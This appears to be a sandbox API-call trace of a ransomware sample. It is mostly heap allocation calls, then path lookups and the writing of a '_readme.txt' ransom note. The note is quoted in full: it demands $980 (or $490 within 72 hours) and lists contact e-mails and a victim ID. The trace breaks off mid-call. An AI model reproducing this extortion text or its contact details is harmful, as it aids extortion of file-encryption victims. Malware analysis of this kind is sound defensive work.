HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.479] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0227.479] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.479] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.479] PathFindFileNameW (pszPath="") returned="" [0227.479] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.480] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.480] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.480] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.481] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0227.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.481] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0227.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.482] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.482] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 